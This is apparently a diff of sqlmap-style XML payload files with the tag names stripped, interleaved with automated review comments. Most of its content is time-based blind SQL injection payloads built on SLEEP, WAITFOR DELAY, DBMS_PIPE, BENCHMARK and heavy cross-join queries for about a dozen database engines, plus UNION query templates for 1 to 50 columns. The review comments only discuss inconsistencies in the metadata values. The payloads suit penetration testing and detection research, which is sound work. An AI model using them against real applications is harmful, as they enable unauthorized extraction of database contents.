+ Sybase
+ Windows
+
+
+
+
+ Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)
+ 5
+ 4
+ 2
+ 1,3
+ 3
+ (SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))
+
+ (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))
+
+
+
+
+
+ Microsoft SQL Server
+ Sybase
+ Windows
+
+
+
+
+
+ Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)
+ 5
+ 3
+ 0
+ 1,3
+ 3
+ BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;
+
+ BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;
+
+
+
+
+
+ Oracle
+
+
+
+
+ Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)
+ 5
+ 3
+ 1
+ 1,3
+ 3
+ (SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)
+
+ (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)
+
+
+
+
+
+ Oracle
+
+
+
+
+ Oracle time-based blind - Parameter replace (heavy queries)
+ 5
+ 4
+ 2
+ 1,3
+ 3
+ (SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)
+
+ (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)
+
+
+
+
+
+ Oracle
+
+
+
+
+ SQLite > 2.0 time-based blind - Parameter replace (heavy query)
+ 5
+ 4
+ 2
+ 1,2,3
+ 3
+ (SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END))
+
+ (SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))))
+
+
+
+
+
+ SQLite
+ > 2.0
+
+
+
+
+ Firebird time-based blind - Parameter replace (heavy query)
+ 5
+ 5
+ 2
+ 1,2,3
+ 3
+ IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])
+
+ (SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)
+
+
+
+
+
+ Firebird
+ >= 2.0
+
+
+
+
+ SAP MaxDB time-based blind - Parameter replace (heavy query)
+ 5
+ 5
+ 2
+ 1,3
+ 3
+ (SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)
+
+ (SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)
+
+
+
+
+
+ SAP MaxDB
+
+
+
+
+ IBM DB2 time-based blind - Parameter replace (heavy query)
+ 5
+ 5
+ 2
+ 1,2,3
+ 3
+ (SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))
+
+ (SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)
+
+
+
+
+
+ IBM DB2
+
+
+
+
+
+ HSQLDB >= 1.7.2 time-based blind - Parameter replace (heavy query)
+ 5
+ 4
+ 2
+ 1,2,3
+ 1
+ (SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
+
+ (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
+
+
+
+
+
+ HSQLDB
+ >= 1.7.2
+
+
+
+
+ HSQLDB > 2.0 time-based blind - Parameter replace (heavy query)
+ 5
+ 5
+ 2
+ 1,2,3
+ 1
+ (SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))
+
+ (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))
+
+
+
+
+
+ HSQLDB
+ > 2.0
+
+
+
+
+
+
+
+ MySQL >= 5.0.11 time-based blind - GROUP BY and ORDER BY clauses
+ 5
+ 3
+ 1
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
+
+
+
+
+
+ MySQL
+ >= 5.0.11
+
+
+
+
+ MySQL < 5.0.12 time-based blind - GROUP BY and ORDER BY clauses (heavy query)
+ 5
+ 4
+ 2
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
+
+
+
+
+
+ MySQL
+
+
+
+
+ PostgreSQL > 8.1 time-based blind - GROUP BY and ORDER BY clauses
+ 5
+ 3
+ 1
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))
+
+
+
+
+
+ PostgreSQL
+ > 8.1
+
+
+
+
+ PostgreSQL time-based blind - GROUP BY and ORDER BY clauses (heavy query)
+ 5
+ 4
+ 2
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))
+
+
+
+
+
+ PostgreSQL
+
+
+
+
+ Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses
+ 5
+ 3
+ 1
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
+
+
+
+
+
+ Microsoft SQL Server
+ Sybase
+ Windows
+
+
+
+
+ Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)
+ 5
+ 4
+ 2
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
+
+
+
+
+
+ Microsoft SQL Server
+ Sybase
+ Windows
+
+
+
+
+ Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_LOCK.SLEEP)
+ 5
+ 3
+ 0
+ 2,3
+ 1
+ ,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)
+
+ ,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)
+
+
+
+
+
+ Oracle
+
+
+
+
+ Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_PIPE.RECEIVE_MESSAGE)
+ 5
+ 3
+ 1
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
+
+
+
+
+
+ Oracle
+
+
+
+
+ Oracle time-based blind - GROUP BY and ORDER BY clauses (heavy query)
+ 5
+ 4
+ 2
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
+
+
+
+
+
+ Oracle
+
+
+
+
+ HSQLDB >= 1.7.2 time-based blind - GROUP BY and ORDER BY clauses (heavy query)
+ 5
+ 4
+ 2
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
+ --
+
+
+
+
+
+ HSQLDB
+ >= 1.7.2
+
+
+
+
+ HSQLDB > 2.0 time-based blind - GROUP BY and ORDER BY clauses (heavy query)
+ 5
+ 4
+ 2
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))
+
+
+
+
+
+ HSQLDB
+ > 2.0
+
+
+
+
+
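Review bot: The four HSQLDB OR time-based entries (`HSQLDB >= 1.7.2 OR time-based blind (heavy query)`, its `- comment` twin, and the two `HSQLDB > 2.0 OR` entries) carry `2` and `1` as their third and fifth metadata values, whereas every other OR entry in this hunk carries `3` and `2`; the `2`/`1` pair is exactly what their AND counterparts use, so this looks like a copy-paste carry-over from the AND block. If those are the stripped `risk` and `where` fields, the lower risk means these OR payloads run at a level the file otherwise reserves for the safer AND forms, and the `where` value changes how the OR is attached to the original parameter value. I'd align them with the other OR entries, `3` and `2`. Separately, `MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)` declares `> 5.0.11` in its version field, which disagrees with its own title; one of the two should change.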
diff --git a/xml/payloads/06_union_query.xml b/xml/payloads/06_union_query.xml
new file mode 100644
index 000000000..a3ec3f4b1
--- /dev/null
+++ b/xml/payloads/06_union_query.xml
@@ -0,0 +1,742 @@
+
+
+
+
+
+ MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)
+ 3
+ 1
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ [CHAR]
+ [COLSTART]-[COLSTOP]
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)
+ 3
+ 1
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ NULL
+ [COLSTART]-[COLSTOP]
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)
+ 3
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ [RANDNUM]
+ [COLSTART]-[COLSTOP]
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query ([CHAR]) - 1 to 10 columns
+ 3
+ 1
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ [CHAR]
+ 1-10
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query (NULL) - 1 to 10 columns
+ 3
+ 1
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ NULL
+ 1-10
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query ([RANDNUM]) - 1 to 10 columns
+ 3
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ [RANDNUM]
+ 1-10
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query ([CHAR]) - 11 to 20 columns
+ 3
+ 2
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ [CHAR]
+ 11-20
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query (NULL) - 11 to 20 columns
+ 3
+ 2
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ NULL
+ 11-20
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query ([RANDNUM]) - 11 to 20 columns
+ 3
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ [RANDNUM]
+ 11-20
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query ([CHAR]) - 21 to 30 columns
+ 3
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ [CHAR]
+ 21-30
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query (NULL) - 21 to 30 columns
+ 3
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ NULL
+ 21-30
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query ([RANDNUM]) - 21 to 30 columns
+ 3
+ 4
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ [RANDNUM]
+ 21-30
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query ([CHAR]) - 31 to 40 columns
+ 3
+ 4
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ [CHAR]
+ 31-40
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query (NULL) - 31 to 40 columns
+ 3
+ 4
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ NULL
+ 31-40
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query ([RANDNUM]) - 31 to 40 columns
+ 3
+ 5
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ [RANDNUM]
+ 31-40
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query ([CHAR]) - 41 to 50 columns
+ 3
+ 5
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ [CHAR]
+ 41-50
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query (NULL) - 41 to 50 columns
+ 3
+ 5
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ NULL
+ 41-50
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query ([RANDNUM]) - 41 to 50 columns
+ 3
+ 5
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ [RANDNUM]
+ 41-50
+
+
+
+
+
+ MySQL
+
+
+
+
+ Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)
+ 3
+ 1
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ [CHAR]
+ [COLSTART]-[COLSTOP]
+
+
+
+
+
+
+
+ Generic UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)
+ 3
+ 1
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ NULL
+ [COLSTART]-[COLSTOP]
+
+
+
+
+
+
+
+ Generic UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)
+ 3
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ [RANDNUM]
+ [COLSTART]-[COLSTOP]
+
+
+
+
+
+
+
+ Generic UNION query ([CHAR]) - 1 to 10 columns
+ 3
+ 1
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ [CHAR]
+ 1-10
+
+
+
+
+
+
+
+ Generic UNION query (NULL) - 1 to 10 columns
+ 3
+ 1
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ NULL
+ 1-10
+
+
+
+
+
+
+
+ Generic UNION query ([RANDNUM]) - 1 to 10 columns
+ 3
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ [RANDNUM]
+ 1-10
+
+
+
+
+
+
+
+ Generic UNION query ([CHAR]) - 11 to 20 columns
+ 3
+ 2
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ [CHAR]
+ 11-20
+
+
+
+
+
+
+
+ Generic UNION query (NULL) - 11 to 20 columns
+ 3
+ 2
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ NULL
+ 11-20
+
+
+
+
+
+
+
+ Generic UNION query ([RANDNUM]) - 11 to 20 columns
+ 3
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ [RANDNUM]
+ 11-20
+
+
+
+
+
+
+
+ Generic UNION query ([CHAR]) - 21 to 30 columns
+ 3
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ [CHAR]
+ 21-30
+
+
+
+
+
+
+
+ Generic UNION query (NULL) - 21 to 30 columns
+ 3
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ NULL
+ 21-30
+
+
+
+
+
+
+
+ Generic UNION query ([RANDNUM]) - 21 to 30 columns
+ 3
+ 4
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ [RANDNUM]
+ 21-30
+
+
+
+
+
+
+
+ Generic UNION query ([CHAR]) - 31 to 40 columns
+ 3
+ 4
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ [CHAR]
+ 31-40
+
+
+
+
+
+
+
+ Generic UNION query (NULL) - 31 to 40 columns
+ 3
+ 4
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ NULL
+ 31-40
+
+
+
+
+
+
+
+ Generic UNION query ([RANDNUM]) - 31 to 40 columns
+ 3
+ 5
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ [RANDNUM]
+ 31-40
+
+
+
+
+
+
+
+ Generic UNION query ([CHAR]) - 41 to 50 columns
+ 3
+ 5
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ [CHAR]
+ 41-50
+
+
+
+
+
+
+ Generic UNION query (NULL) - 41 to 50 columns
+ 3
+ 5
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ NULL
+ 41-50
+
+
+
+
+
+
+
+ Generic UNION query ([RANDNUM]) - 41 to 50 columns
+ 3
+ 5
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ [RANDNUM]
+ 41-50
+
+
+
+
+
+
+
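Review bot: The ranking convention in this new file is never stated — the second numeric field rises with each column range (1 for 1–10 columns, 2 for 11–20, up to 5 for 41–50) and the `[RANDNUM]` variant of every range sits one step above its `[CHAR]`/`NULL` siblings — so a maintainer adding a 51–60 range or a new DBMS has nothing to go on; the view here shows element text without tag names, so I take these fields to be sqlmap's level/risk values — confirm against the element names. I would add one comment under the root element, along the lines of `<!-- Each column range is a (CHAR, NULL, RANDNUM) triple: level grows with the column range, the RANDNUM variant is one level above its CHAR/NULL pair, risk stays 1 throughout (presumably because UNION tests only read data; verify) -->`. The same comment should note that each MySQL/Generic pair differs only in the trailing comment marker (`#` vs `--`) and that the Generic entries carry no DBMS value on purpose, since the blank DBMS lines otherwise read like an omission.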